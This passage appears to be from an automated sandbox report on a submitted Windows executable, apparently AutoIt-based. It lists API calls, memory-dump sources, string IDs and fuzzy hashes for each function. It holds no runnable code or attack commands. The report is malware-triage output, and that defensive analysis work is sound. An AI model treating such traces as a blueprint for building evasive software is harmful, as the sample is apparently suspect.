                                                                                                                                              APIs
                                                                                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                                              • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                                              • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                                              • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                              • API String ID: 2295938435-2354261254
                                                                                                                                              • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                              • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                                              • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                              • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                                                                              • API String ID: 3038501623-2263619337
                                                                                                                                              • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                                                              • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                                              • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                                                              • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                                                              APIs
                                                                                                                                              • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                                              • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                                              • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                                              • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                              • API String ID: 2295938435-8599901
                                                                                                                                              • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                              • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                                              • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                              • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                                              APIs
                                                                                                                                              • timeGetTime.WINMM ref: 00443B67
                                                                                                                                                • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                                              • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                                              • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                                              • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                                              • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                                                              • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                                              • IsWindow.USER32(?), ref: 00443C3A
                                                                                                                                              • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                                                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                              • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                                              • String ID: BUTTON
                                                                                                                                              • API String ID: 1834419854-3405671355
                                                                                                                                              • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                              • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                                              • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                              • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                                              • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                              • _wprintf.LIBCMT ref: 00454074
                                                                                                                                              • __swprintf.LIBCMT ref: 004540A3
                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                              • API String ID: 455036304-4153970271
                                                                                                                                              • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                              • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                                              • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                              • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                                              APIs
                                                                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                                              • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                                              • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                                              • _memmove.LIBCMT ref: 00467EB8
                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                                              • _memmove.LIBCMT ref: 00467F6C
                                                                                                                                              • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2170234536-0
                                                                                                                                              • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                                              • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                                              • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                                                                                                                              • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                                              APIs
                                                                                                                                              • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                                              • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                                              • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                                              • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                                              • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                                              • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                                              • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 541375521-0
                                                                                                                                              • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                              • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                                              • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                              • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                                              • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                                              • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                                              • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                                              • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3096461208-0
                                                                                                                                              • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                              • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                                              • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                              • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                                              APIs
                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                                              • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                                              • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                                              • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                                              • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                                              • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                                              • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                                              • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                                              • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                                              • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                                              • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3218148540-0
                                                                                                                                              • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                              • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                                              • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                                              • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 136442275-0
                                                                                                                                              • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                              • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                                              • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                                              • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                                              APIs
                                                                                                                                              • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                                              • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                                              • _wcstok.LIBCMT ref: 004674FF
                                                                                                                                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                                              • _wcstok.LIBCMT ref: 004675B2
                                                                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                              • _wcslen.LIBCMT ref: 00467793
                                                                                                                                              • _wcscpy.LIBCMT ref: 00467641
                                                                                                                                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                              • _wcslen.LIBCMT ref: 004677BD
                                                                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                                              • String ID: X
                                                                                                                                              • API String ID: 3104067586-3081909835
                                                                                                                                              • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                                                              • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                                              • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                                                                                                                              • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                                              APIs
                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0046CBC7
